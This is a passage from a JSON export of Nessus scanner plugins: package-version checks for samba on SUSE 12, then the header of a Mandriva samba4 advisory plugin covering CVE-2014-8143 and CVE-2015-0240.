reference:\"libregistry0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libregistry0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debugsource-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libregistry0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libregistry0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debugsource-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-4.1.12-16.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:19", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities has been discovered and corrected in samba4 :\n\nSamba 4.0.x before 4.0.24, 4.1.x before 4.1.16, and 4.2.x before\n4.2rc4, when an Active Directory Domain Controller (AD DC) is\nconfigured, allows remote authenticated users to set the LDB\nuserAccountControl UF_SERVER_TRUST_ACCOUNT bit, and consequently gain\nprivileges, by leveraging delegation of authority for user-account or\ncomputer-account creation (CVE-2014-8143).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\n\nThe updated packages provides a solution for these security issues.", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2015-083.NASL", "href": "https://www.tenable.com/plugins/nessus/82336", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : samba4 (MDVSA-2015:083)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:083. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82336);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2014-8143\", \"CVE-2015-0240\");\n script_xref(name:\"MDVSA\", value:\"2015:083\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba4 (MDVSA-2015:083)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in samba4 :\n\nSamba 4.0.x before 4.0.24, 4.1.x before 4.1.16, and 4.2.x before\n4.2rc4, when an Active Directory Domain Controller (AD DC) is\nconfigured, allows remote authenticated users to set the LDB\nuserAccountControl UF_SERVER_TRUST_ACCOUNT bit, and consequently gain\nprivileges, by leveraging delegation of authority for user-account or\ncomputer-account creation (CVE-2014-8143).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\n\nThe updated packages provides a solution for these security issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-4.1.15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-4.1.16.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-4.1.17.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2014-8143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2015-0240\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-dc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-smbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-test0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba41\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n 